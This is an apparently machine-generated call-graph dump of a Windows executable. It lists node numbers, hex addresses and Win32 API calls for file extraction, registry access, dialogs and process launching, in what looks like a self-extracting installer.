12035->12036 12037 4115cf GetProcAddress 12035->12037 12036->11938 12038 4115e5 FreeLibrary 12037->12038 12039 4115df 12037->12039 12038->12036 12039->12038 12065 409293 12040->12065 12042 4098ec 12082 4096af GetModuleHandleA FindResourceA 12042->12082 12044 4098f3 12044->11940 12046 406495 OleUninitialize 12045->12046 12047 40649b 12045->12047 12046->12047 12047->11947 12049 411610 12048->12049 12050 41160d FreeLibrary 12048->12050 12051 411617 FreeLibrary 12049->12051 12052 40d46a 12049->12052 12050->12049 12051->12052 12052->11953 12057 40b729 GetCurrentDirectoryA 12052->12057 12054 40b71f 12053->12054 12055 40b723 12054->12055 12056 40b706 PeekMessageA WaitForSingleObject 12054->12056 12055->11957 12056->12054 12058 40b7b8 12057->12058 12059 40b74d 12057->12059 12058->11953 12087 40a5bd CompareStringA 12059->12087 12061 40b767 12061->12058 12062 40b76b SetCurrentDirectoryA 12061->12062 12063 40b782 ctype 12062->12063 12064 40b797 SHFileOperationA 12063->12064 12064->12058 12066 4092a0 12065->12066 12067 4092b7 GetModuleFileNameA 12066->12067 12069 4092dc 12066->12069 12068 4092d3 12067->12068 12068->12069 12079 40930d ctype 12068->12079 12070 405097 5 API calls 12069->12070 12074 409309 12070->12074 12071 4054ed 35 API calls 12073 40941c 12071->12073 12072 404fdc 33 API calls 12072->12074 12086 40a1ec GetProcessHeap RtlAllocateHeap 12073->12086 12074->12072 12076 40568a 39 API calls 12074->12076 12074->12079 12080 4054ed 35 API calls 12074->12080 12081 4093f7 12074->12081 12076->12074 12077 40942a 12078 40568a 39 API calls 12077->12078 12077->12079 12078->12079 12079->12042 12080->12074 12081->12071 12081->12079 12083 4096dd 12082->12083 12085 4096d7 12082->12085 12084 409553 wvsprintfA 12083->12084 12084->12085 12085->12044 12086->12077 12087->12061 12107 40c59d 12108 40c5a7 12107->12108 12122 40bfe1 12107->12122 12138 40bd80 12108->12138 12109 40b613 ExpandEnvironmentStringsA 12109->12122 12111 40ca58 12112 40c021 lstrcmpiA 12112->12122 12113 40c068 GetCurrentDirectoryA 12113->12122 12114 40c2fe SetWindowTextA 12114->12122 12115 40b7ba 3 API calls 12115->12122 12116 40a224 4 API calls 12116->12122 12117 40c41e RegOpenKeyExA 12119 40c43a RegQueryValueExA RegCloseKey 12117->12119 12117->12122 12118 405bdd MultiByteToWideChar 12118->12122 12119->12122 12120 405fad 14 API calls 12120->12122 12121 40a205 ctype 2 API calls 12121->12122 12122->12109 12122->12111 12122->12112 12122->12113 12122->12114 12122->12115 12122->12116 12122->12117 12122->12118 12122->12120 12122->12121 12123 40b9b0 3 API calls 12122->12123 12125 405bca FindClose 12122->12125 12131 40c3ee SendMessageA 12122->12131 12136 40c0f0 ctype 12122->12136 12126 40c3af GetDlgItem SetWindowTextA SendMessageA 12123->12126 12124 40c0f5 SetFileAttributesA 12127 40c1bb GetFileAttributesA 12124->12127 12124->12136 12125->12122 12126->12122 12129 40c1c9 DeleteFileA 12127->12129 12127->12136 12128 406ea5 GetVersionExA 12128->12136 12129->12136 12130 405fad 14 API calls 12130->12136 12131->12122 12132 40c1e6 wsprintfA GetFileAttributesA 12134 40c208 MoveFileA 12132->12134 12132->12136 12133 407300 4 API calls 12133->12136 12134->12136 12135 40c229 MoveFileExA 12135->12136 12136->12122 12136->12124 12136->12127 12136->12128 12136->12130 12136->12132 12136->12133 12136->12135 12137 40c19a SHFileOperationA 12136->12137 12137->12127 12139 40bd92 ctype 12138->12139 12142 40be45 12139->12142 12148 40bf92 12139->12148 12163 40a59a CompareStringA 12139->12163 12141 405767 3 API calls 12143 40be59 12141->12143 12142->12141 12157 40be6f 12143->12157 12164 405822 GetFullPathNameA 12143->12164 12145 40beb7 ShellExecuteExA 12146 40bee9 12145->12146 12147 40becc ShellExecuteExA 12145->12147 12149 40bf36 CloseHandle 12146->12149 12150 40bf20 WaitForInputIdle 12146->12150 12151 40bf08 IsWindowVisible 12146->12151 12147->12146 12147->12148 12148->12122 12154 40bf44 12149->12154 12155 40bf51 12149->12155 12153 40b6ea 3 API calls 12150->12153 12151->12150 12152 40bf13 ShowWindow 12151->12152 12152->12150 12153->12149 12166 40a59a CompareStringA 12154->12166 12159 40bf7d Sleep 12155->12159 12160 40bf83 12155->12160 12157->12145 12158 405767 3 API calls 12157->12158 12161 40beaf 12158->12161 12159->12160 12160->12148 12162 40bf88 ShowWindow 12160->12162 12161->12145 12161->12148 12162->12148 12163->12142 12165 40584a 12164->12165 12165->12157 12166->12155 10071 40cc24 10072 40cc31 10071->10072 10192 40309d 10072->10192 10075 40cc5d 10079 40cc6f 10075->10079 10082 40cc67 10075->10082 10083 40ccce GetDlgItemTextA 10075->10083 10076 40d04f 10077 40d073 10076->10077 10078 40d064 SendMessageA 10076->10078 10080 40d08c 10077->10080 10081 40d07c SendDlgItemMessageA 10077->10081 10078->10077 10267 40ba36 10080->10267 10081->10080 10086 40cca7 10082->10086 10087 40cc6a 10082->10087 10085 40cd08 10083->10085 10083->10086 10088 40cd10 10085->10088 10089 40cd22 GetDlgItem 10085->10089 10086->10079 10096 40ccff EndDialog 10086->10096 10087->10079 10309 4098f7 10087->10309 10098 40d2a5 10088->10098 10104 40cffe 10088->10104 10092 40cd36 SendMessageA SendMessageA 10089->10092 10093 40cd57 SetFocus 10089->10093 10092->10093 10198 4058ff 10093->10198 10094 40d102 SetMenu 10100 40d159 GetCurrentDirectoryA GetDlgItem 10094->10100 10095 40d10b SetWindowPos DestroyWindow SendMessageA 10101 40d147 SendMessageA 10095->10101 10102 40d13c SendMessageA 10095->10102 10096->10079 10119 40bf99 47 API calls 10098->10119 10106 40d184 10100->10106 10107 40d18a SetWindowTextA 10100->10107 10101->10100 10102->10101 10109 4098f7 3 API calls 10104->10109 10106->10107 10285 40aafc 10107->10285 10114 40d00b SetDlgItemTextA 10109->10114 10110 40cd8b SetCurrentDirectoryA 10116 40cda3 GetLastError 10110->10116 10117 40cdaa 10110->10117 10111 40cd7b GetLastError 10115 40cd82 10111->10115 10113 40cc8f SetDlgItemTextA 10113->10079 10122 40d01e 10114->10122 10115->10110 10116->10117 10205 406ea5 10117->10205 10121 40d2be 10119->10121 10126 40d2d6 10121->10126 10127 40d2cc KiUserCallbackDispatcher 10121->10127 10128 4098f7 3 API calls 10122->10128 10131 40d2f0 10126->10131 10350 40307f GetDlgItem KiUserCallbackDispatcher 10126->10350 10127->10126 10132 40d03b 10128->10132 10129 40bf99 47 API calls 10165 40d1d1 10129->10165 10130 40d234 10130->10121 10139 40bf99 47 API calls 10130->10139 10136 40d31b 10131->10136 10149 40d315 PostMessageA 10131->10149 10150 40d30d SendMessageA 10131->10150 10138 4098f7 3 API calls 10132->10138 10133 40cdc4 GetTickCount wsprintfA 10140 40cdeb 10133->10140 10134 40ce31 10145 40cef0 10134->10145 10146 40ce4f GetModuleFileNameA wsprintfA ShellExecuteExA 10134->10146 10136->10079 10144 4098f7 3 API calls 10136->10144 10137 40cf4d 10217 40b92f 10137->10217 10143 40d042 MessageBoxA 10138->10143 10147 40d24d 10139->10147 10208 4051d8 10140->10208 10141 40d2e7 10351 40307f GetDlgItem KiUserCallbackDispatcher 10141->10351 10143->10079 10152 40d32a SetDlgItemTextA 10144->10152 10155 4098f7 3 API calls 10145->10155 10146->10145 10153 40cecd WaitForInputIdle Sleep 10146->10153 10154 40d27e 10147->10154 10161 40d25e 10147->10161 10149->10136 10150->10136 10152->10079 10160 40cf40 KiUserCallbackDispatcher 10153->10160 10154->10098 10164 40d289 DialogBoxParamA 10154->10164 10162 40cefa wsprintfA 10155->10162 10157 4098f7 3 API calls 10157->10165 10159 40cf68 10224 40307f GetDlgItem KiUserCallbackDispatcher 10159->10224 10160->10079 10167 406d54 29 API calls 10161->10167 10168 40cf22 10162->10168 10163 40ce02 10169 40ce14 ctype 10163->10169 10170 40ce09 GetLastError 10163->10170 10164->10098 10165->10130 10165->10157 10176 40d211 10165->10176 10172 40d273 10167->10172 10175 4098f7 3 API calls 10168->10175 10169->10134 10169->10137 10170->10169 10171 40cf71 10225 40307f GetDlgItem KiUserCallbackDispatcher 10171->10225 10347 40a205 10172->10347 10178 40cf2b MessageBoxA 10175->10178 10176->10130 10179 40d219 10176->10179 10177 40cf79 10226 40bf99 10177->10226 10178->10160 10321 406d54 10179->10321 10183 40bf99 47 API calls 10184 40cf95 10183->10184 10257 40b322 10184->10257 10187 40bf99 47 API calls 10190 40cfb2 10187->10190 10188 40cfd8 10320 40307f GetDlgItem KiUserCallbackDispatcher 10188->10320 10190->10188 10191 40bf99 47 API calls 10190->10191 10191->10188 10193 4030a6 10192->10193 10194 4030ca 10192->10194 10196 4030c8 10193->10196 10352 40970e 10193->10352 10369 40952c 10194->10369 10196->10075 10196->10076 10202 405910 10198->10202 10199 4059b4 10199->10110 10199->10111 10200 40598a 10200->10199 10381 405898 10200->10381 10202->10200 10204 405898 6 API calls 10202->10204 10391 40e115 WideCharToMultiByte 10202->10391 10204->10202 10206 406ee6 10205->10206 10207 406eb8 GetVersionExA 10205->10207 10206->10133 10206->10134 10206->10169 10207->10206 10209 4051e7 10208->10209 10210 406ea5 GetVersionExA 10209->10210 10211 4051fb 10210->10211 10212 405221 CreateFileA 10211->10212 10213 40520b CreateFileW 10211->10213 10214 405237 10212->10214 10213->10214 10215 40e115 WideCharToMultiByte 10214->10215 10216 405268 10214->10216 10215->10216 10216->10163 10218 40b943 10217->10218 10219 40b9ab 10217->10219 10218->10219 10220 40b95c RegCreateKeyExA 10218->10220 10223 40307f GetDlgItem KiUserCallbackDispatcher 10219->10223 10220->10219 10221 40b982 10220->10221 10222 40b98a RegSetValueExA RegCloseKey 10221->10222 10222->10219 10223->10159 10224->10171 10225->10177 10227 40bfa6 10226->10227 10228 40ca58 10227->10228 10399 40b613 10227->10399 10228->10183 10230 40c021 lstrcmpiA 10241 40bfd4 10230->10241 10231 40b613 ExpandEnvironmentStringsA 10231->10241 10232 40c068 GetCurrentDirectoryA 10232->10241 10233 40c2fe SetWindowTextA 10233->10241 10236 40c41e RegOpenKeyExA 10238 40c43a RegQueryValueExA RegCloseKey 10236->10238 10236->10241 10238->10241 10240 40a205 ctype 2 API calls 10240->10241 10241->10228 10241->10230 10241->10231 10241->10232 10241->10233 10241->10236 10241->10240 10250 40c3ee SendMessageA 10241->10250 10255 40c0f0 ctype 10241->10255 10403 40b9b0 10241->10403 10410 405bdd 10241->10410 10414 405fad 10241->10414 10423 405bca 10241->10423 10426 40b7ba 10241->10426 10432 40a224 10241->10432 10243 40c0f5 SetFileAttributesA 10246 40c1bb GetFileAttributesA 10243->10246 10243->10255 10248 40c1c9 DeleteFileA 10246->10248 10246->10255 10247 406ea5 GetVersionExA 10247->10255 10248->10255 10249 405fad 14 API calls 10249->10255 10250->10241 10251 40c1e6 wsprintfA GetFileAttributesA 10253 40c208 MoveFileA 10251->10253 10251->10255 10253->10255 10254 40c229 MoveFileExA 10254->10255 10255->10241 10255->10243 10255->10246 10255->10247 10255->10249 10255->10251 10255->10254 10256 40c19a SHFileOperationA 10255->10256 10418 407300 10255->10418 10256->10246 10258 40b32f 10257->10258 10449 40dd5a 10258->10449 10260 40b354 10452 403888 10260->10452 10264 40b3ca 10471 403981 10264->10471 10266 40b3d5 10266->10187 11781 40ad27 10267->11781 10270 40ba4c GetWindow 10271 40bb22 GetDlgItem GetWindowRect MapWindowPoints SetMenu CreateWindowExA 10270->10271 10274 40ba69 10270->10274 10271->10094 10271->10095 10272 40ba7e GetClassNameA 11786 40da54 CompareStringA 10272->11786 10274->10271 10274->10272 10275 40baa6 GetWindowLongA 10274->10275 10276 40bb07 GetWindow 10274->10276 10275->10276 10277 40bab6 SendMessageA 10275->10277 10276->10271 10276->10274 10277->10276 10278 40bac8 GetObjectA 10277->10278 11787 40ace4 10278->11787 10280 40badd 11791 40aca1 10280->11791 11795 40abdc GetDC CreateCompatibleDC CreateCompatibleDC GetObjectA 10280->11795 10283 40baed SendMessageA 10283->10276 10284 40bb00 DeleteObject 10283->10284 10284->10276 10286 406ea5 GetVersionExA 10285->10286 10287 40ab07 10286->10287 10288 40ab9c 10287->10288 10289 40ab56 GetClassNameA 10287->10289 10290 40ab22 GetModuleHandleA 10287->10290 10297 40ca95 10288->10297 10291 40ab6b lstrcmpiA 10289->10291 10292 40ab8e 10289->10292 10293 40ab31 GetProcAddress 10290->10293 10294 40ab42 10290->10294 10291->10292 10295 40ab80 FindWindowExA 10291->10295 10292->10288 10296 40ab93 SHAutoComplete 10292->10296 10293->10294 10294->10288 10294->10289 10295->10292 10296->10288 10298 40caa2 10297->10298 11798 401884 10298->11798 10303 40cb1c 10306 401b38 ctype 2 API calls 10303->10306 10304 40a668 2 API calls 10308 40caf6 10304->10308 10305 40a205 ctype 2 API calls 10305->10303 10307 40cb27 10306->10307 10307->10129 10307->10165 10308->10303 10308->10305 10310 409907 10309->10310 10311 40993a LoadStringA 10310->10311 10312 40994c LoadStringA 10310->10312 10311->10312 10313 40995a 10311->10313 10312->10313 10314 409553 wvsprintfA 10313->10314 10315 409967 10314->10315 10316 4027d8 SHGetMalloc 10315->10316 10317 4027f3 SHBrowseForFolderA 10316->10317 10319 4027ef 10316->10319 10318 402830 SHGetPathFromIDListA 10317->10318 10317->10319 10318->10319 10319->10079 10319->10113 10320->10088 10322 406d65 OleInitialize #17 10321->10322 10323 406d77 ShowWindow 10321->10323 10322->10323 11891 406ced LoadCursorA RegisterClassExA 10323->11891 10325 406d92 GetWindowRect GetParent MapWindowPoints 10326 406dc6 DestroyWindow 10325->10326 10327 406dcd GetParent CreateWindowExA 10325->10327 10326->10327 10328 406e18 10327->10328 10329 406e0a ShowWindow UpdateWindow 10327->10329 10330 406e2d 10328->10330 10331 406e1e 10328->10331 10329->10328 10333 406e34 DestroyWindow 10330->10333 10334 406e3e ShowWindow 10330->10334 10332 406e2b 10331->10332 11892 4066b3 GetTickCount GetTickCount 10331->11892 10332->10130 10333->10334 10336 406e4d 10334->10336 11899 40a1ec GetProcessHeap RtlAllocateHeap 10336->11899 10338 406e5b 10339 406e7a 10338->10339 11900 4065e9 10338->11900 11906 406a19 10339->11906 10343 40a205 ctype 2 API calls 10344 406e8a 10343->10344 10344->10332 10345 406e8e SetWindowTextA 10344->10345 10346 40a205 ctype 2 API calls 10345->10346 10346->10332 10348 40a220 10347->10348 10349 40a20e GetProcessHeap RtlFreeHeap 10347->10349 10348->10154 10349->10348 10350->10141 10351->10131 10372 409637 10352->10372 10354 40972d GetWindowRect GetClientRect 10355 409768 10354->10355 10356 40979b 10354->10356 10357 4097db GetSystemMetrics GetWindow 10355->10357 10358 40976e SetWindowPos 10355->10358 10356->10357 10359 4097a1 GetWindowTextA 10356->10359 10362 4097ff 10357->10362 10358->10356 10375 409553 10359->10375 10361 4098d9 10361->10196 10362->10361 10364 40980c GetWindowTextA 10362->10364 10365 409553 wvsprintfA 10362->10365 10366 409855 GetWindowRect SetWindowPos 10362->10366 10367 4098bb GetWindow 10362->10367 10363 4097cb SetWindowTextA 10363->10357 10364->10362 10368 40983f SetWindowTextA 10365->10368 10366->10367 10367->10361 10367->10362 10368->10362 10370 409550 10369->10370 10371 409532 GetWindowLongA SetWindowLongA 10369->10371 10370->10196 10371->10370 10373 409553 wvsprintfA 10372->10373 10374 409659 10373->10374 10374->10354 10376 40956a 10375->10376 10378 4095d5 10375->10378 10379 40a610 wvsprintfA 10376->10379 10378->10363 10380 40a635 10379->10380 10380->10378 10382 406ea5 GetVersionExA 10381->10382 10383 4058a1 10382->10383 10384 4058bd CreateDirectoryA 10383->10384 10386 4058b2 CreateDirectoryW 10383->10386 10385 4058c8 10384->10385 10387 4058e2 GetLastError 10385->10387 10388 4058cc 10385->10388 10386->10385 10389 4058de 10387->10389 10388->10389 10393 4057e8 10388->10393 10389->10199 10392 40e139 10391->10392 10392->10202 10394 406ea5 GetVersionExA 10393->10394 10395 4057ed 10394->10395 10396 40580c SetFileAttributesA 10395->10396 10398 4057ff SetFileAttributesW 10395->10398 10397 40581a 10396->10397 10397->10389 10398->10397 10400 40b620 10399->10400 10401 40b6ae ExpandEnvironmentStringsA 10400->10401 10402 40b6d4 10400->10402 10401->10402 10402->10241 10404 40ba32 GetDlgItem SetWindowTextA SendMessageA 10403->10404 10405 40b9c2 10403->10405 10404->10241 10406 40b9d1 RegOpenKeyExA 10405->10406 10406->10404 10407 40b9ee RegQueryValueExA 10406->10407 10408 40ba29 RegCloseKey 10407->10408 10409 40ba1a 10407->10409 10408->10404 10409->10408 10411 405bea 10410->10411 10412 405c05 10411->10412 10437 40e144 MultiByteToWideChar 10411->10437 10412->10241 10417 405fbb 10414->10417 10415 406038 10415->10241 10416 405c10 14 API calls 10416->10417 10417->10415 10417->10416 10439 4072db 10418->10439 10421 40a610 wvsprintfA 10422 407326 10421->10422 10422->10255 10424 405bd5 FindClose 10423->10424 10425 405bdc 10423->10425 10424->10425 10425->10241 10427 40b7c7 10426->10427 10447 40a1ec GetProcessHeap RtlAllocateHeap 10427->10447 10429 40b613 ExpandEnvironmentStringsA 10431 40b7d3 10429->10431 10430 40b871 10430->10241 10431->10429 10431->10430 10433 40a237 GetProcessHeap HeapReAlloc 10432->10433 10434 40a22d 10432->10434 10436 40a235 10433->10436 10448 40a1ec GetProcessHeap RtlAllocateHeap 10434->10448 10436->10241 10438 40e163 10437->10438 10438->10412 10442 40da9a 10439->10442 10443 4072e9 10442->10443 10444 40daa5 10442->10444 10443->10421 10443->10422 10446 40a250 OemToCharBuffA CharUpperA CharToOemBuffA 10444->10446 10446->10443 10447->10431 10448->10436 10477 40dc32 10449->10477 10451 40dd65 10451->10260 10453 403891 10452->10453 10592 40a668 10453->10592 10456 4038c0 10595 410b78 10456->10595 10460 404950 10461 40495d 10460->10461 10466 4049e5 10461->10466 10646 406045 10461->10646 10463 404a72 10465 4098f7 3 API calls 10463->10465 10469 404a9f 10463->10469 10467 404a96 10465->10467 10466->10463 10470 406045 15 API calls 10466->10470 10652 4047ab 10466->10652 10468 40b2a9 16 API calls 10467->10468 10468->10469 10469->10264 10470->10466 10472 40399c ctype 10471->10472 10473 40398f 10471->10473 10472->10266 10474 41020a 2 API calls 10473->10474 10475 403996 10474->10475 10476 40a65b ctype 2 API calls 10475->10476 10476->10472 10478 40dc48 10477->10478 10485 401313 10478->10485 10480 40dc51 10484 40dc9a 10480->10484 10491 40eb33 10480->10491 10482 40dc7b 10497 4012b7 10482->10497 10484->10451 10486 401327 10485->10486 10489 40134f 10485->10489 10487 40a224 4 API calls 10486->10487 10488 40133f 10487->10488 10488->10489 10503 403443 10488->10503 10489->10480 10492 40eb47 10491->10492 10493 40eb74 10491->10493 10494 40a224 4 API calls 10492->10494 10493->10482 10495 40eb64 10494->10495 10495->10493 10496 403443 31 API calls 10495->10496 10496->10493 10498 4012f6 10497->10498 10499 4012cb 10497->10499 10498->10484 10500 40a224 4 API calls 10499->10500 10501 4012e6 10500->10501 10501->10498 10502 403443 31 API calls 10501->10502 10502->10498 10508 40339f 10503->10508 10509 4098f7 3 API calls 10508->10509 10510 4033a6 10509->10510 10521 40ae5a 10510->10521 10513 40328f 10514 40329c 10513->10514 10515 4032bd 10514->10515 10538 405472 10514->10538 10515->10489 10522 40ae6a 10521->10522 10523 4033ac 10521->10523 10522->10523 10524 40ae6f wvsprintfA 10522->10524 10523->10513 10526 40ad46 GetDlgItem 10524->10526 10527 40ad76 10526->10527 10528 40ada8 SendMessageA SendMessageA 10526->10528 10535 40649c 10527->10535 10530 40adf8 SendMessageA SendMessageA SendMessageA 10528->10530 10531 40addc 10528->10531 10533 40ae42 SendMessageA 10530->10533 10534 40ae24 SendMessageA 10530->10534 10531->10530 10533->10523 10534->10533 10536 4064b1 ShowWindow SendMessageA SendMessageA 10535->10536 10537 4064a6 DestroyWindow 10535->10537 10536->10528 10537->10536 10539 405483 10538->10539 10540 4032b2 10539->10540 10555 404fac 10539->10555 10562 404f2e 10539->10562 10543 40b877 10540->10543 10544 40b8a1 10543->10544 10545 40b88c 10543->10545 10547 4032b7 10544->10547 10548 40b8b6 ShowWindow 10544->10548 10546 4098f7 3 API calls 10545->10546 10549 40b893 SetDlgItemTextA 10546->10549 10554 40a600 ExitProcess 10547->10554 10550 40b8c6 10548->10550 10551 40b8e3 10548->10551 10549->10544 10550->10551 10552 40b8ce SendMessageA 10550->10552 10551->10547 10589 40a82d PeekMessageA 10551->10589 10552->10551 10556 404fb5 10555->10556 10557 404fb9 10555->10557 10556->10539 10558 404fc4 10557->10558 10559 404f2e 31 API calls 10557->10559 10558->10556 10568 405866 10558->10568 10559->10558 10563 404f3a 10562->10563 10564 404f40 10562->10564 10563->10539 10564->10563 10565 404f60 10564->10565 10566 404f4e FindCloseChangeNotification 10564->10566 10565->10563 10574 4032d5 10565->10574 10566->10565 10569 406ea5 GetVersionExA 10568->10569 10570 40586b 10569->10570 10571 405886 DeleteFileA 10570->10571 10573 40587d DeleteFileW 10570->10573 10572 404fda 10571->10572 10572->10539 10573->10572 10575 4032e1 10574->10575 10576 4032f4 10574->10576 10577 4098f7 3 API calls 10575->10577 10578 40328f 31 API calls 10576->10578 10579 4032ec 10577->10579 10580 403300 10578->10580 10582 40b2a9 10579->10582 10580->10563 10583 40b2b6 10582->10583 10584 40b302 10583->10584 10585 40b2c7 GetLastError wvsprintfA 10583->10585 10584->10576 10586 40ae5a 13 API calls 10585->10586 10587 40b2f5 10586->10587 10587->10584 10588 40b2fb SetLastError 10587->10588 10588->10584 10590 40a848 GetMessageA TranslateMessage DispatchMessageA 10589->10590 10591 40a869 10589->10591 10590->10591 10591->10551 10608 40a1ec GetProcessHeap RtlAllocateHeap 10592->10608 10594 4038b3 10594->10456 10603 40fe4c 10594->10603 10596 410b83 10595->10596 10602 410ba2 10595->10602 10597 40a668 2 API calls 10596->10597 10599 410b8d 10597->10599 10601 403443 31 API calls 10599->10601 10599->10602 10601->10602 10609 410a90 10602->10609 10640 40609f 10603->10640 10605 40fe54 10643 407ad8 10605->10643 10608->10594 10610 4038d3 10609->10610 10611 410aa0 ctype 10609->10611 10610->10460 10613 41018e 10611->10613 10622 40dbcb 10613->10622 10616 4101cb 10617 40dbcb 2 API calls 10616->10617 10619 4101d6 10617->10619 10620 4101fd 10619->10620 10621 40fee6 2 API calls 10619->10621 10621->10619 10623 40dbd4 10622->10623 10624 40dbda 10622->10624 10625 40a205 ctype 2 API calls 10623->10625 10624->10616 10626 40fee6 10624->10626 10625->10624 10631 40fad6 10626->10631 10636 4012aa 10631->10636 10634 4012aa ctype 2 API calls 10635 40fae9 10634->10635 10637 4012b0 10636->10637 10638 4012b6 10636->10638 10639 40a205 ctype 2 API calls 10637->10639 10638->10634 10639->10638 10641 40a668 2 API calls 10640->10641 10642 4060ac 10641->10642 10642->10605 10644 40609f 2 API calls 10643->10644 10645 407ae0 10644->10645 10645->10456 10647 40605e 10646->10647 10649 406062 10647->10649 10671 405c10 10647->10671 10649->10461 10650 406074 10650->10649 10651 406079 FindClose 10650->10651 10651->10649 10653 4047b8 10652->10653 10714 4051ac 10653->10714 10657 404805 10659 404809 10657->10659 10664 404820 10657->10664 10658 4047e7 10955 401b38 10658->10955 10943 4076a4 10659->10943 10664->10658 10669 406045 15 API calls 10664->10669 10670 4048d3 10664->10670 10947 4077c1 10664->10947 10667 4048f0 10667->10658 10760 401ce5 10667->10760 10822 403a34 10667->10822 10669->10664 10755 4038d8 10670->10755 10672 406ea5 GetVersionExA 10671->10672 10673 405c23 10672->10673 10674 405c30 10673->10674 10675 405dec 10673->10675 10677 40e144 MultiByteToWideChar 10674->10677 10679 405c3d 10674->10679 10676 405e07 10675->10676 10680 405df8 10675->10680 10678 40e115 WideCharToMultiByte 10676->10678 10677->10679 10678->10680 10683 405ca2 FindNextFileW 10679->10683 10684 405c6e FindFirstFileW 10679->10684 10681 405e29 FindFirstFileA 10680->10681 10682 405e5f FindNextFileA 10680->10682 10685 405e3d GetLastError 10681->10685 10692 405e8a 10681->10692 10686 405e81 10682->10686 10687 405e6c GetLastError 10682->10687 10689 405cc4 10683->10689 10690 405caf GetLastError 10683->10690 10688 405c82 GetLastError 10684->10688 10693 405ccd 10684->10693 10691 405e48 10685->10691 10710 405c91 10685->10710 10686->10692 10686->10710 10687->10686 10688->10710 10689->10693 10689->10710 10690->10689 10691->10710 10694 40e144 MultiByteToWideChar 10692->10694 10695 40e115 WideCharToMultiByte 10693->10695 10697 405eb8 10694->10697 10696 405cfb 10695->10696 10698 40e115 WideCharToMultiByte 10696->10698 10700 40df79 3 API calls 10697->10700 10699 405d41 10698->10699 10711 40df79 FileTimeToLocalFileTime FileTimeToSystemTime 10699->10711 10702 405f59 10700->10702 10704 40df79 3 API calls 10702->10704 10703 405d9d 10705 40df79 3 API calls 10703->10705 10707 405f6b 10704->10707 10706 405daf 10705->10706 10708 40df79 3 API calls 10706->10708 10709 40df79 3 API calls 10707->10709 10708->10710 10709->10710 10710->10650 10712 40dfd9 10711->10712 10713 40dfff SystemTimeToFileTime 10712->10713 10713->10703 10960 405097 10714->10960 10716 4051bd 10717 4047e3 10716->10717 10971 40348e 10716->10971 10717->10658 10719 401357 10717->10719 10980 40568a 10719->10980 10721 401376 10722 4013b0 10721->10722 10723 401397 10721->10723 10745 40137b 10721->10745 10991 403952 10722->10991 10725 4013ab 10723->10725 11007 4054ed 10723->11007 10727 401ce5 51 API calls 10725->10727 10730 401499 10727->10730 11001 401264 10730->11001 10731 4013c4 10733 40568a 39 API calls 10731->10733 10747 4013d7 10733->10747 10735 401437 10738 401485 10735->10738 10739 40146f 10735->10739 10736 4098f7 3 API calls 10737 4014b7 10736->10737 10741 40b2a9 16 API calls 10737->10741 10738->10725 10742 40a205 ctype 2 API calls 10738->10742 10743 40a205 ctype 2 API calls 10739->10743 10739->10745 10740 4014c1 10740->10745 11004 40a7e9 10740->11004 10741->10740 10742->10725 10743->10745 10745->10657 10746 401582 10750 401ce5 51 API calls 10746->10750 10752 401609 10746->10752 10754 401264 35 API calls 10746->10754 10747->10735 10748 4054ed 35 API calls 10747->10748 10749 40144c 10748->10749 10749->10735 10751 40568a 39 API calls 10749->10751 10750->10746 10751->10735 11012 40a810 10752->11012 10754->10746 10756 40554a 35 API calls 10755->10756 10757 4038e6 10756->10757 11070 40e0e1 GetSystemTime SystemTimeToFileTime 10757->11070 10761 401cf2 10760->10761 10762 404fdc 33 API calls 10761->10762 10764 401cfc 10762->10764 10763 401d72 11073 408d14 10763->11073 10764->10763 10766 40568a 39 API calls 10764->10766 10768 401d51 10766->10768 10767 401ded 10769 401d56 10767->10769 10777 401df7 10767->10777 10768->10769 10771 401da4 10768->10771 11090 402c96 10768->11090 11083 401b80 10769->11083 11096 402dbd 10771->11096 10774 401d99 10774->10771 10778 404f2e 31 API calls 10774->10778 10775 401d6b 10775->10667 10776 40a205 ctype 2 API calls 10776->10775 10779 401e43 10777->10779 10780 401e74 10777->10780 10778->10771 10781 4098f7 3 API calls 10779->10781 10783 408d14 43 API calls 10780->10783 10782 401e4f 10781->10782 10784 40b2a9 16 API calls 10782->10784 10810 401e9c 10783->10810 10801 401d5d 10784->10801 10785 4024c1 10786 4024fa 10785->10786 10787 4024df 10785->10787 10786->10775 10792 40a205 ctype 2 API calls 10786->10792 10789 4098f7 3 API calls 10787->10789 10788 40248a 10790 4098f7 3 API calls 10788->10790 10793 4024eb 10789->10793 10794 402495 10790->10794 10791 401ed1 10791->10785 10791->10788 10795 40a7e9 33 API calls 10791->10795 10792->10775 10796 40b2a9 16 API calls 10793->10796 10797 40b2a9 16 API calls 10794->10797 10798 40244e 10795->10798 10796->10801 10799 40249c 10797->10799 10800 404fdc 33 API calls 10798->10800 10802 404f2e 31 API calls 10799->10802 10803 402455 10800->10803 10801->10775 10801->10776 10802->10801 10804 4054ed 35 API calls 10803->10804 10806 402466 10804->10806 10807 40247c 10806->10807 11105 40574f 10806->11105 10808 40a810 35 API calls 10807->10808 10809 402484 10808->10809 10809->10785 10809->10788 10810->10791 10811 4020c0 10810->10811 10813 402147 10810->10813 10814 4020f1 10811->10814 11100 401708 10811->11100 10813->10814 10815 40e115 WideCharToMultiByte 10813->10815 10814->10791 11104 40dba8 OemToCharA 10814->11104 10816 4021a3 CharToOemA 10815->10816 10816->10814 10818 40238a 10819 4098f7 3 API calls 10818->10819 10820 402392 10819->10820 10821 40b2a9 16 API calls 10820->10821 10821->10791 10824 403a41 10822->10824 10823 403a77 10825 403b56 10823->10825 10828 403a7b ctype 10823->10828 10835 403aa5 10823->10835 10824->10823 10824->10828 11166 41126f 10824->11166 10827 403b91 OemToCharA 10825->10827 10825->10828 10829 403bb1 10827->10829 10828->10667 11108 402aee 10829->11108 10830 403afe 10831 403b06 10830->10831 10832 403b48 ctype 10830->10832 10831->10828 10836 41126f 58 API calls 10831->10836 10832->10828 10834 401264 35 API calls 10832->10834 10834->10828 10835->10830 10835->10832 11205 40382e 10835->11205 10837 403b22 10836->10837 10837->10828 10839 4054ed 35 API calls 10837->10839 10839->10828 10840 403bd1 10841 40e115 WideCharToMultiByte 10840->10841 10842 403c4d 10840->10842 10841->10842 10842->10828 10843 4054ed 35 API calls 10842->10843 10844 403d46 10843->10844 10844->10832 11114 40bb56 10844->11114 10847 402c96 2 API calls 10848 403dc2 10847->10848 10849 403dc6 10848->10849 10855 403df0 10848->10855 10850 40ae5a 13 API calls 10849->10850 10851 403dcd 10850->10851 10852 4098f7 3 API calls 10851->10852 10853 403ddc 10852->10853 10854 40ae5a 13 API calls 10853->10854 10854->10828 10856 40da9a 3 API calls 10855->10856 10858 403e68 10856->10858 10857 40e144 MultiByteToWideChar 10859 403eb1 10857->10859 10858->10857 10858->10859 10860 406045 15 API calls 10859->10860 10861 403fd0 10859->10861 10862 403fa1 